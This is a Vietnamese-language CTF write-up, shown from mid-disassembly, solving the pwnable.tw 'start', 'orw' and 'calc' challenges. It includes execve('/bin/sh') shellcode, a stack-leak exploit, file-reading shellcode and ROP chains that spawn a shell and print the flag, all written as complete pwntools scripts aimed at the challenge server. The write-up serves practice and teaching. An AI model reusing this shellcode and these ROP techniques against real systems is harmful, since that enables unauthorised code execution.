   0x0804808b &lt;+43&gt;:	mov    bl,0x1
   0x0804808d &lt;+45&gt;:	mov    al,0x4
   0x0804808f &lt;+47&gt;:	int    0x80
   0x08048091 &lt;+49&gt;:	xor    ebx,ebx
   0x08048093 &lt;+51&gt;:	mov    dl,0x3c
   0x08048095 &lt;+53&gt;:	mov    al,0x3
   0x08048097 &lt;+55&gt;:	int    0x80
   0x08048099 &lt;+57&gt;:	add    esp,0x14
   0x0804809c &lt;+60&gt;:	ret    

</code></pre></div><p>Như chúng ta thấy thì code asm này khá thô, code dùng những phương thức đơn giản nhất đó chính là sys_call, ví dụ khi eax = 1 thì gọi sys_exit, sys_read = 3, sys_write = 4 ,&hellip;
Về việc in ra dòng <em>Let&rsquo;s start the CTF:</em> thì chương trình chỉ push chuỗi dưới dạng hex vào stack sau đó gọi sys_write để in ra mà thôi!</p>
<p>Sau đó gọi sys_read để đọc input vào và tăng esp lên 0x14 để ret. Điều đó làm mình có thể suy đoán là stack này sẽ có độ dài là 0x14.</p>
<p>Vậy thì không có lỗ hổng thông thường nào như gets(), &hellip; được xuất hiện ở đây, điều đó có nghĩa là chúng ta chỉ việc đưa shellcode vào stack và thực hiện shell thôi!
Để thực hiện được việc gọi shellcode quyền năng là &ldquo;/bin/sh&rdquo; thì chúng ta search gg có shellcode sau :</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">   0:   31 c9                   xor    ecx, ecx
   2:   f7 e1                   mul    ecx
   4:   51                      push   ecx
   5:   68 2f 2f 73 68          push   0x68732f2f
   a:   68 2f 62 69 6e          push   0x6e69622f
   f:   89 e3                   mov    ebx, esp
  11:   b0 0b                   mov    al, 0xb
  13:   cd 80                   int    0x80

shellcode = b&#39;\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80&#39;
</code></pre></div><p>Sau đó yêu cầu tiếp theo là chúng ta phải tìm được esp_addr thì mới có thể add shellcode vào và thực thi được, để tìm được thì chúng ta chú ý câu lệnh <em>&quot; 0x08048087 &lt;+39&gt;:	mov    ecx,esp&quot;</em> câu lệnh này có nghĩa là esp sẽ được đưa vào ecx nên từ đấy chúng ta có thể leak được esp sau đó tính toán stack trả về và đưa shellcode vào :</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">from pwn import *

BIN = &#34;./start&#34;
DEBUG = 1

shellcode = b&#39;\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80&#39;
addr = 0x08048087 

io = process(BIN)
context.log_level = &#39;debug&#39;
# io = remote(&#34;chall.pwnable.tw&#34;, 10000)


#_breakpoint = &#34;&#34;&#34;
#		0x08048099
#	&#34;&#34;&#34;
#gdb.attach(io,_breakpoint)
io.recvuntil(&#34;CTF:&#34;)
payload = b&#39;A&#39; * 0x14 + p32(addr)
io.send(payload)
esp_addr = u32(io.recv(4))
 
print(&#34;[+]Esp address = &#34;, hex(esp_addr))
 
payload = b&#39;A&#39; * 0x14 + p32(esp_addr + 0x14) + shellcode
io.sendline(payload)
io.interactive()
</code></pre></div><h2 id="orw">orw</h2>
<p>Bài này thì đề như là đề mở vậy vì đề bài đã hướng dẫn cả rồi:</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">Read the flag from /home/orw/flag.
Only open read write syscall are allowed to use.
</code></pre></div><p>Còn khi vào chạy thử thì chương trình in ra chuỗi <em>&ldquo;Give my your shellcode:&quot;</em> không biết phải trêu mình hay không, nhưng mà vẫn nên disassemble cho chắc ăn vậy 😆😆😆</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">0x08048548 &lt;+0&gt;:	lea    ecx,[esp+0x4]
   0x0804854c &lt;+4&gt;:	and    esp,0xfffffff0
   0x0804854f &lt;+7&gt;:	push   DWORD PTR [ecx-0x4]
   0x08048552 &lt;+10&gt;:	push   ebp
   0x08048553 &lt;+11&gt;:	mov    ebp,esp
   0x08048555 &lt;+13&gt;:	push   ecx
   0x08048556 &lt;+14&gt;:	sub    esp,0x4
   0x08048559 &lt;+17&gt;:	call   0x80484cb &lt;orw_seccomp&gt;
   0x0804855e &lt;+22&gt;:	sub    esp,0xc
   0x08048561 &lt;+25&gt;:	push   0x80486a0
   0x08048566 &lt;+30&gt;:	call   0x8048380 &lt;printf@plt&gt;
   0x0804856b &lt;+35&gt;:	add    esp,0x10
   0x0804856e &lt;+38&gt;:	sub    esp,0x4
   0x08048571 &lt;+41&gt;:	push   0xc8
   0x08048576 &lt;+46&gt;:	push   0x804a060
   0x0804857b &lt;+51&gt;:	push   0x0
   0x0804857d &lt;+53&gt;:	call   0x8048370 &lt;read@plt&gt;
   0x08048582 &lt;+58&gt;:	add    esp,0x10
   0x08048585 &lt;+61&gt;:	mov    eax,0x804a060
   0x0804858a &lt;+66&gt;:	call   eax
   0x0804858c &lt;+68&gt;:	mov    eax,0x0
   0x08048591 &lt;+73&gt;:	mov    ecx,DWORD PTR [ebp-0x4]
   0x08048594 &lt;+76&gt;:	leave  
   0x08048595 &lt;+77&gt;:	lea    esp,[ecx-0x4]
   0x08048598 &lt;+80&gt;:	ret    

</code></pre></div><p>Bài này đã dùng 1 phiên bản nâng cấp hơn của asm so với bài trước để viết, dùng nhiều hàm hơn như hàm printf@plt,read@plt,&hellip; và cả hàm <a href="https://man7.org/linux/man-pages/man2/seccomp.2.html">orw_seccomp</a> về cơ bản thì orw_seccomp là 1 hàm lọc sys_call, nên là như đề bài cho thì chỉ có sys_open = 5, sys_read = 3, sys_write = 4 là được cho phép!</p>
<p>Với dữ kiện là địa chỉ của file flag và 3 phương thức trên thì bài này chủ yếu sẽ là mình viết ra được cái shellcode để lấy được flag về và in ra! Điều đó có nghĩa flow sẽ là :</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">sys_open(filename=&#34;/home/orw/flag&#34;)
sys_read()
sys_write()
</code></pre></div><p>Dựa vào luồng ở trên thì chúng ta phải cố gắng search gg 7749 cách để viết ra được cái shellcode dạng code asm như sau :
Đầu tiên phải chuyển string sang bytes :</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">/home/orw/flag = 2f 68 6f 6d  65 2f 6f 72  77 2f 66 6c  61 67
</code></pre></div><p>Vậy push chuỗi lần lượt là :</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">push 0x6761;
push 0x6c662f77;
push 0x726f2f65;
push 0x6d6f682f;
mov eax,0x5;  sys_open
mov ebx,esp;  push str
int 0x80; 
mov eax,0x3;  sys_read file
mov ebx,0x3;
mov edx,0x30;
int 0x80
mov eax,0x4;  sys_write 
mov ebx,0x1;
mov edx,0x30;
int 0x80
</code></pre></div><p>Viết được cái shellcode này là ăn chắc được 60% rồi !
Sau đó dùng hàm asm() trong pwntool để chuyển sang bytes và đưa vào shellcode rồi viết file exploit thôi 😄😄</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">from pwn import *

filename=&#34;push 0x6761; push 0x6c662f77; push 0x726f2f65; push 0x6d6f682f&#34;
sys_open=&#34;;mov eax,0x5;mov ebx,esp;int 0x80;&#34;
sys_read=&#34;mov eax,0x3;mov ebx,0x3;mov edx,0x30;int 0x80;&#34;
sys_write=&#34;mov eax,0x4;mov ebx,0x1;mov edx,0x30;int 0x80;&#34;

shellcode=asm(filename+sys_open+sys_read+sys_write)

payload=shellcode
s=remote(&#39;chall.pwnable.tw&#39;,10001)
print(s.recv(1024))
s.sendline(payload)

print(s.recv())
s.interactive()

</code></pre></div><p>Done! :&lt; 😆😆😆 🦈🦈🦈🦈</p>
<h2 id="cacl">cacl</h2>
<p>Đây là 1 bài khá phức tạp! Mình phải mất kha khá thời gian để có thể hiểu được flow của chương trình, sau khi chạy thử binary với một số test khác nhau, ta có nhận xét:</p>
<ul>
<li>
<p>Chương trình sẽ thực hiện các tính toán cơ bản</p>
</li>
<li>
<p>Khi nhập vào biểu thức như: 8 – – 6 chương trình sẽ không thực hiện được</p>
</li>
<li>
<p>Khi nhập biểu thức dạng + 10, chương trình lại cho ra kết quả là 0.</p>
</li>
</ul>
<p>Dựa vào IDA mà chúng ta có mã giả sau :</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">int __cdecl main(int argc, const char **argv, const char **envp)
{
  ssignal(14, timeout);
  alarm(60);
  puts(&#34;=== Welcome to SECPROG calculator ===&#34;);
  fflush(stdout);
  calc();
  return puts(&#34;Merry Christmas!&#34;);
}
</code></pre></div><p>Đây là hàm main chính của chương trình và hàm <em>calc()</em> sẽ là thứ chúng ta cần phân tích sâu:</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">unsigned int calc()
{
  int count; // [esp+18h] [ebp-5A0h]
  int number[100]; // [esp+1Ch] [ebp-59Ch]
  char input; // [esp+1ACh] [ebp-40Ch]
  unsigned int canary; // [esp+5ACh] [ebp-Ch]

  canary = __readgsdword(0x14u);
  while ( 1 )
  {
    bzero(&amp;input, 0x400u);
    if ( !get_expr((int)&amp;input, 1024) )
      break;
    init_pool(&amp;count);
    if ( parse_expr(&amp;input, &amp;count) )
    {
      printf((const char *)&amp;format, number[count - 1]);
      fflush(stdout);
    }
  }
  return __readgsdword(0x14u) ^ canary;
</code></pre></div><p>Như trên (đã được rename tên biến) chúng ta thấy hàm <em>calc()</em> có nhiều hàm con phía trong nhưng chúng ta chỉ cần chú ý vào những hàm như *get_expr(), init_pool(), parse_expr() *. Đầu tiên là vào hàm <em>get_expr()</em> :</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">int __cdecl get_expr(int _input, int a2)
{
int v2; // eax
char v4; // [esp+1Bh] [ebp-Dh]
int v5; // [esp+1Ch] [ebp-Ch]

v5 = 0;
while ( v5 &lt; a2 &amp;&amp; read(0, &amp;v4, 1) != -1 &amp;&amp; v4 != 10 )
{
  if ( v4 == &#39;+&#39; || v4 == &#39;-&#39; || v4 == &#39;*&#39; || v4 == &#39;/&#39; || v4 == &#39;%&#39; || v4 &gt; &#39;/&#39; &amp;&amp; v4 &lt;= &#39;9&#39; )
  {
    v2 = v5++;
    *(_BYTE *)(_input + v2) = v4;
  }
}
*(_BYTE *)(v5 + _input) = 0;
return v5;
}
</code></pre></div><p>Đây có thể nói là 1 hàm kiểm tra format của input, theo format này sẽ có dạng : a1 + a2 or a1 - a2, &hellip; Điều đó dẫn đến lỗi khi thực hiện phép tính 8&ndash;6 vì vị trí của 2 phép tính lại ở cùng nhau. Hàm này còn chỉ nhận input là các phép tính hoặc số từ 0 - 9. Sau đó sắp xếp các phần tử tham gia vào các phép tính để chuẩn bị cho các hàm sau.</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">_DWORD *__cdecl init_pool(_DWORD *count)
{
  _DWORD *result; // eax
  signed int i; // [esp+Ch] [ebp-4h]

  result = count;
  *count = 0;
  for ( i = 0; i &lt;= 99; ++i )
  {
    result = count;
    count[i + 1] = 0;
  }
  return result;
</code></pre></div><p>Đây là hàm khởi tạo giá trị cho count và 100 giá trị 0 sau biến count. Điều này có nghĩa là mảng number cũng sẽ được gán bằng 0.
Qua 2 hàm trên là để set mọi thứ về dúng format và bây giờ sẽ là hàm phức tạp nhất <em>parse_expr()</em>. Hàm này sẽ thực hiện tính toán và in ra hết quả:</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">signed int __cdecl parse_expr(char *input, _DWORD *count)
{
char *v2; // ST2C_4
int v4; // eax
char *v5; // [esp+20h] [ebp-88h]
int i; // [esp+24h] [ebp-84h]
int v7; // [esp+28h] [ebp-80h]
char *s1; // [esp+30h] [ebp-78h]
int v9; // [esp+34h] [ebp-74h]
char s[100]; // [esp+38h] [ebp-70h]
unsigned int v11; // [esp+9Ch] [ebp-Ch]

v11 = __readgsdword(0x14u);
v5 = input;
v7 = 0;
bzero(s, 0x64u);
for ( i = 0; ; ++i )
{
  if ( (unsigned int)(input[i] - 48) &gt; 9 )
  {
    v2 = (char *)(&amp;input[i] - v5);
    s1 = (char *)malloc(v2 + 1);
    memcpy(s1, v5, v2);
    s1[(_DWORD)v2] = 0;
    if ( !strcmp(s1, &#34;0&#34;) )
    {
      puts(&#34;prevent division by zero&#34;);
      fflush(stdout);
      return 0;
    }
    v9 = atoi(s1);
    if ( v9 &gt; 0 )
    {
      v4 = (*count)++;
      count[v4 + 1] = v9;
    }
    if ( input[i] &amp;&amp; (unsigned int)(input[i + 1] - 48) &gt; 9 )
    {
      puts(&#34;expression error!&#34;);
      fflush(stdout);
      return 0;
    }
    v5 = &amp;input[i + 1];
    if ( s[v7] )
    {
      switch ( input[i] )
      {
        case 37:
        case 42:
        case 47:
          if ( s[v7] != 43 &amp;&amp; s[v7] != 45 )
          {
            eval(count, s[v7]);
            s[v7] = input[i];
          }
          else
          {
            s[++v7] = input[i];
          }
          break;
        case 43:
        case 45:
          eval(count, s[v7]);
          s[v7] = input[i];
          break;
        default:
          eval(count, s[v7--]);
          break;
      }
    }
    else
    {
      s[v7] = input[i];
    }
    if ( !input[i] )
      break;
  }
}
while ( v7 &gt;= 0 )
  eval(count, s[v7--]);
return 1;
}
</code></pre></div><p>Hàm này sẽ thực hiện theo các bước sau:</p>
<ul>
<li>Kiếm tra các phần tử tính toán, sẽ không thực hiện phép tính có số 0 vì điều kiện kiểm tra</li>
<li>Chuyển chữ số thành số để thực hiện phép tính</li>
<li>Sau đó kiểm tra logic để thực hiện tính toán nhân chia trước cộng trừ sau.</li>
</ul>
<p>Sau đó gọi hàm <em>eval()</em> để tính toán</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">_DWORD *__cdecl eval(_DWORD *count, char a2)
{
  _DWORD *result; // eax

  if ( a2 == 43 )
  {
    count[*count - 1] += count[*count];
  }
  else if ( a2 &gt; 43 )
  {
    if ( a2 == 45 )
    {
      count[*count - 1] -= count[*count];
    }
    else if ( a2 == 47 )
    {
      count[*count - 1] /= count[*count];
    }
  }
  else if ( a2 == 42 )
  {
    count[*count - 1] *= count[*count];
  }
  result = count;
  --*count;
  return result;
</code></pre></div><p>Lấy ví dụ phép toán hiện tại là ‘+’ thì hàm eval() sẽ tính count[*count-1] += count[*count]. Phép tính này thực chất tương đương với: number[count-2] += number[count-1]. Sau khi tính xong kết quả, giảm biến count đi 1 đơn vị. Như vậy kết quả phép tính đến thời điểm hiện tại (sau khi đã giảm biến đếm count) được lưu vào number[count-1].
Sau đó in ra kết quả ngoài màn hình.</p>
<p>Nhưng có 1 lỗi mà chưa được giải thích! Đó là tại sao khi chúng ta +10 lại ra 0 ???
Flow chương trình khi input là “+10”:</p>
<ul>
<li>Trong hàm parse_expr(), khi duyệt đến kí tự đầu tiên ‘+’, lúc này i = 0, v2 = 0, s1 = NULL, v9 = 0 nên không có số nào được thêm vào mảng number[]. Vì chưa có phép toán nào trong chuỗi s nên phép toán ‘+’ sẽ được add vào.</li>
<li>Chương trình duyệt đến kí tự ‘1’ và ‘0’, lúc này i = 2, v2 = 2, s1 = ’10’, v9 = 10. Không còn kí tự nào nữa nên lệnh eval() trong nhánh default được thực hiện</li>
<li>count = 1, number[] = [10]. Do đó phép tính trên thực chất tương đương với: count = count + number[count-1] = 1 + 10 = 11. Sau đó có lệnh count–- nên count = 10. Hàm parse_expr() kết thúc, chương trình in ra giá trị tại number[count-1] = number[9] = count[10] = 0 vì mảng number đã được khởi tạo tất cả giá trị = 0 trước đó.</li>
</ul>
<p>Vậy chúng ta có thể khai thác lỗi sau bằng cách biết được offset của vị trí ô nhớ so với biến count và giá trị muốn thay đổi .
Dùng gdb để kiếm tra stack và chúng ta được bảng stack sau :</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">|offset| address | value |
|   1  |ebp-0x5A0| count |
|   1  |ebp-0x59C| number|
|      |         |       |
|      |         |       |
|      |         |       |
|  101 |ebp-0x40C| input |
|      |         |       |
|      |         |       |
|      |         |       |
|      |         |       |
|  357 |ebp-0xC  | canary|
|      |         |       |
|      |         |       |
|  360 |   ebp   |pre_ebp|
|  361 | ebp+0x4 |return |
</code></pre></div><p>Để làm được tới đây là xem như chúng ta đã hoàn thành đến 70% bài này rồi!
Sau đó chỉ việc kiếm đoạn ROPgadget và thực thi nó thôi!
Hiện tại thì mình tìm được 2 cái ROP :</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">	p += pack(&#39;&lt;I&#39;, 0x080701aa) # pop edx ; ret
	p += pack(&#39;&lt;I&#39;, 0x080ec060) # @ .data
	p += pack(&#39;&lt;I&#39;, 0x0805c34b) # pop eax ; ret
	p += &#39;/bin&#39;
	p += pack(&#39;&lt;I&#39;, 0x0809b30d) # mov dword ptr [edx], eax ; ret
	p += pack(&#39;&lt;I&#39;, 0x080701aa) # pop edx ; ret
	p += pack(&#39;&lt;I&#39;, 0x080ec064) # @ .data + 4
	p += pack(&#39;&lt;I&#39;, 0x0805c34b) # pop eax ; ret
	p += &#39;//sh&#39;
	p += pack(&#39;&lt;I&#39;, 0x0809b30d) # mov dword ptr [edx], eax ; ret
	p += pack(&#39;&lt;I&#39;, 0x080701aa) # pop edx ; ret
	p += pack(&#39;&lt;I&#39;, 0x080ec068) # @ .data + 8
	p += pack(&#39;&lt;I&#39;, 0x080550d0) # xor eax, eax ; ret
	p += pack(&#39;&lt;I&#39;, 0x0809b30d) # mov dword ptr [edx], eax ; ret
	p += pack(&#39;&lt;I&#39;, 0x080481d1) # pop ebx ; ret
	p += pack(&#39;&lt;I&#39;, 0x080ec060) # @ .data
	p += pack(&#39;&lt;I&#39;, 0x080701d1) # pop ecx ; pop ebx ; ret
	p += pack(&#39;&lt;I&#39;, 0x080ec068) # @ .data + 8
	p += pack(&#39;&lt;I&#39;, 0x080ec060) # padding without overwrite ebx
	p += pack(&#39;&lt;I&#39;, 0x080701aa) # pop edx ; ret
	p += pack(&#39;&lt;I&#39;, 0x080ec068) # @ .data + 8
	p += pack(&#39;&lt;I&#39;, 0x080550d0) # xor eax, eax ; ret
	p += pack(&#39;&lt;I&#39;, 0x0807cb7f) # inc eax ; ret
	p += pack(&#39;&lt;I&#39;, 0x0807cb7f) # inc eax ; ret
	p += pack(&#39;&lt;I&#39;, 0x0807cb7f) # inc eax ; ret
	p += pack(&#39;&lt;I&#39;, 0x0807cb7f) # inc eax ; ret
	p += pack(&#39;&lt;I&#39;, 0x0807cb7f) # inc eax ; ret
	p += pack(&#39;&lt;I&#39;, 0x0807cb7f) # inc eax ; ret
	p += pack(&#39;&lt;I&#39;, 0x0807cb7f) # inc eax ; ret
	p += pack(&#39;&lt;I&#39;, 0x0807cb7f) # inc eax ; ret
	p += pack(&#39;&lt;I&#39;, 0x0807cb7f) # inc eax ; ret
	p += pack(&#39;&lt;I&#39;, 0x0807cb7f) # inc eax ; ret
	p += pack(&#39;&lt;I&#39;, 0x0807cb7f) # inc eax ; ret
	p += pack(&#39;&lt;I&#39;, 0x08049a21) # int 0x80
</code></pre></div><p>ROP này mình dùng tool ROPgadget viết ra! Nó đơn giản và dài chỉ việc chèn vào stack và thực thi là được .</p>
<p>Cái rop thứ 2 ngắn hơn nhưng yêu cầu đòi hỏi hơn nhiều :</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">ROP 
    0x0805c34b :   pop eax ; ret
    0x0000000b       
    0x080701d0 :   pop edx ; pop ecx ; pop ebx ; ret
    0x00000000
    0x00000000
    address_str
    c :   int 0x80
    #address_str = &#34;/bin/sh&#34; 
    0x6e69622f
    0x0068732f
</code></pre></div><p>ROP này yêu cầu chúng ta phải đưa <em>&quot;/bin/sh&rdquo;</em> vào pre_ebp và đưa địa chỉ của pre_ebp vào vị trí address_str trong stack mẫu trên.
Để leak được pre_ebp chúng ta dựa vào stack offset mà chúng ta đã vẽ ở phía trên.</p>
<h3 id="exploit-">Exploit :</h3>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">from pwn import *

BIN=&#34;./calc&#34;

addrs = [&#39;+361&#39;,&#39;+362&#39;,&#39;+363&#39;,&#39;+364&#39;,&#39;+365&#39;,&#39;+366&#39;,&#39;+367&#39;,&#39;+368&#39;,&#39;+369&#39;]

# ROP 
#     0x0805c34b :   pop eax ; ret
#     0x0000000b       
#     0x080701d0 :   pop edx ; pop ecx ; pop ebx ; ret
#     0x00000000
#     0x00000000
#     address_str
#     c :   int 0x80
# address_str = &#34;/bin/sh&#34; 
# 0x6e69622f
# 0x0068732f

payloads = [0x0805c34b,0x0000000b,0x080701d0,0x00000000,0x00000000,0x00000000,0x08049a21,0x6e69622f,0x0068732f]
#payloads = [0x080701aa, 0x080ec060, 0x0805c34b, int.from_bytes(b&#39;/bin&#39;, byteorder=&#39;little&#39;, signed=False), 0x0809b30d, 0x080701aa, 0x080ec064, 0x0805c34b, int.from_bytes(b&#39;//sh&#39;, byteorder=&#39;little&#39;, signed=False), 0x0809b30d, 0x080701aa, 0x080ec068, 0x080550d0, 0x0809b30d, 0x080481d1, 0x080ec060, 0x080701d1, 0x080ec068, 0x080ec060, 0x080701aa, 0x080ec068, 0x080550d0, 0x0807cb7f, 0x0807cb7f, 0x0807cb7f, 0x0807cb7f, 0x0807cb7f, 0x0807cb7f, 0x0807cb7f, 0x0807cb7f, 0x0807cb7f, 0x0807cb7f, 0x0807cb7f, 0x08049a21]

def Rop(io):
    for i in range(len(payloads)):
        print(&#34;[+] Leak payload : &#34;,addrs[i])
        io.sendline(addrs[i])
        leak_value = int(io.recv(1024)) 
        print(&#34;[+] Leak value : &#34;, leak_value)
        offset = payloads[i]- leak_value
        print(&#34;[+] Offset : &#34;, offset)
        payload = &#39;%s%+d&#39; % (addrs[i],offset)
        print(&#34;[!] Payload : &#34;,payload)
        io.sendline(payload)
        print(&#34;[!] Stack : &#34;,hex(payloads[i]))
        print(&#34;[*]===========&gt; %s&#34;  % hex(int(io.recv(1024))))


#io = process(BIN)
io = remote(&#39;chall.pwnable.tw&#39;, 10100)
#raw_input(&#34;DEBUG&#34;)

# _breakpoint = &#34;&#34;&#34;
#     0x080493f2
#     &#34;&#34;&#34;

# gdb.attach(io,_breakpoint)
io.recv(1024)
io.sendline(&#34;+360&#34;)
pre_ebp = int(io.recv(1024))
payloads[5] = pre_ebp
print(&#34;[-] =========&gt; Pre_ebp: &#34; ,payloads[5])
Rop(io)
io.sendline(&#34;cat /home/calc/flag&#34;)

io.interactive()


#0xffffca9c - &gt; 0xffffd02c


</code></pre></div><p>Và chúng ta đã có thể có flag</p>

    </div>
    <div class="post-footer">
      
    </div>
  </article>

    </main>
  </body>
</html>
